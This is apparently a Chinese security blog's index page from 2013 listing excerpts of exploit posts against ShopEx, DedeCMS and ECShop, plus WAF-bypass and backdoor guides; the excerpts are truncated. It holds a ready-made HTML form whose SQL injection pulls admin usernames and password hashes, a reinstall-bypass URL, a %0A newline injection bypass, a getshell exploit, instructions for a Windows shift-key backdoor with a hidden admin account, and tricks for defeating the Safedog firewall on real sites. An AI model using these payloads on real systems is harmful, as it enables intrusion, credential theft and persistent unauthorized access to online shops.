shopex 4.8.5 api.php注入漏洞0day exp

   
分类:安全 | 2013-08-10 | 撸过 2,712 次
2人扯蛋
<form method='post' action='http://www.webshell.cc/api.php?act=search_dly_type&api_version=1.0'>

columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br />

<input type='submit[......]

继续阅读

dedecms 躺着也中枪 爆重装漏洞

   
分类:安全 | 2013-06-30 | 撸过 3,427 次
4人扯蛋

利用条件:web server: apache
漏洞原因::apache 不认识bak 直接当php执行.

http://webshell.cc/install/index.php.bak?insLockfile=1

dedecms死的太冤枉了. apache的原因.

dedecms最新版本修改任意管理员漏洞 附getshell exp

   
分类:安全 | 2013-06-30 | 撸过 3,083 次
2人扯蛋

此漏洞无视gpc转义,过80sec注入防御。

补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?

起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。

include/dedesql.class.php:

if(isset($GLOBALS['arrs1']))
{
    $v1 = $v2 = '';
    for($i=0;isset($arrs1[$i]);$i++)
    {
        $v1 .= chr($arrs1[$i]);
    }
    for([......]

继续阅读

GET参数SQL注入%0A换行污染绕过

   
分类:安全 | 2013-06-30 | 撸过 2,464 次
2人扯蛋

绕过描述:

在GET请求时,将URL的SQL注入关键字用%0A分隔,%0A是换行符,在mysql中可以正常执行。

 

测试方法:

请求测试url:http://www.webshell.cc/1.php?id=1%20union%20select%201,2,3,4  — 被拦截

 

请求测试url:http://www.webshell.cc/1.php?id=-9%0Aunion%0Aselect 1,2,3,4   —- 绕过

ECShop网店系统最新版本地包含漏洞

   
分类:安全 | 2013-06-30 | 撸过 1,416 次
0人扯蛋

      这个洞,其实我在2012年1月的时候看ecshop就分析出来过,当初由于感觉鸡肋就没怎么放出来。刚下了个官网最新版的,没想到还存在。

漏洞文件在:/demo/index.php

if (!empty($_POST['lang'])) //如果不为空
{
$lang_charset = explode('_', $_POST['lang']); //_分割
$updater_lang = $lang_charset[0].'_'.$lang_charset[1];
$ec_charset = $lang_charset[2]; //我们要控制的。
}
.
.
.
/* 加载升级[......]

继续阅读

shift后门制作和超级帐户的建立

   
分类:安全 | 2013-05-31 | 撸过 2,418 次
3人扯蛋

        前段时间去一个流量过百万的站的服务器上参观,朋友加了一个shift后门并称该后门是很久以前他公布的,具体情况我也没多问,回来后自己也做了一个加密码的shift后门.利用winrar加密的.很简单,火力群里一个小弟弟问我怎么做的,叫我写个说明,那么我就简单介绍一下制作过程-Amxking
  1.我们首先建立一个名为win.rar的压缩包,及一个批处理命令名为AK.bat的文件.
  2.再把这个批处理文件AK.bat加到win.rar压缩包内加密.在高级选项里设置密码如:!@#$%^&
  3.将win.rar做成自解压格式:
  添加新的自解压→Default.SFX 图形界[......]

继续阅读

ECSHOP的flow页注入利用方法&EXP

   
分类:安全 | 2013-05-21 | 撸过 2,532 次
3人扯蛋

利用办法:先注册.把任意商品加入购物车在填写配送地址那一页,有地区选择,随便选个地区,复制地址到exp下。
EXP:

<form name="form1" method="post">
ECSHOP通版本注入漏洞 简单EXP [ Silic Group Hacker Army ]<input name="country" type="text" style="display:none" value="1"/><br />
<textarea rows="5" style="font-family:Times New Roman;font-size:1[......]

继续阅读

IIS写权限利用续以及写权限漏洞来由解释

   
分类:安全 | 2013-04-15 | 撸过 1,626 次
1人扯蛋

           很多人也许觉得IIS PUT这玩意不值一提啊...其实不然,身在乙方,给客户做安服的时候总是遇到IIS写权限的问题,一方面WVS7.0已经可以扫描并且使用POC成功写入漏洞目标,另一方面无聊的土耳其或者印度尼西亚黑客总是喜欢利用写权限上传txt或者html到漏洞目标,以示对方的hack技术的强大。

目前大家所见到的IIS写权限利用,其实说白了是菜鸟管理员对IIS的错误配置问题(2个错误配置造成):
1.WEB服务器扩展里设置WebDAV为允许;
2.网站权限配置里开启了写入权限。

至于WebDAV,看看百度百科的介绍:

WebDAV (Web-based Distri[......]

继续阅读

实战这些年咬过我们的安全狗(总结篇)

   
分类:安全 | 2013-03-24 | 撸过 3,658 次
3人扯蛋

撸主就再次用实例来说明吧
本文是撸主对安全狗实战总结,每一个例子都来自于撸主的亲身经历
分为
0X01 注入
0X02 上传
0X03 提权篇 ,为机油们提供一条龙服务
最后
0x05 现场实例过安全狗

---------------------------------------------
0X01 注入篇
基本方法:a.添加aaa=123%00& (此方法对老狗有效)
b.在被过滤的关键词中添加 % (此方法经常奏效,但是工具不支持,必须手动)

1.1 小姐威客网
这个网站大家熟悉吧,我们就以此为例~~是的~~我们来看看~~

遇狗了吧~~
曾经打狗棒法第一式,%00表[......]

继续阅读

ecshop 最新注入0day漏洞分析报告

   
分类:安全 | 2013-02-23 | 撸过 1,607 次
2人扯蛋

漏洞作者:360

漏洞分析:Seay

博客:www.cnseay.com

 

今天习惯性的到处逛,看看文章。看到了360爆的一个ecshop 支付宝支付插件的注入漏洞,照例的分析下,360的团队还是挺赞的。

 

由于漏洞源于ecshop的支付宝支付插件,所有利用前提是站点安装此插件,利用不受GPC影响。

 

漏洞核心代码在includesmodulespaymentalipay.php 文件 respond()函数,第215行。[......]

继续阅读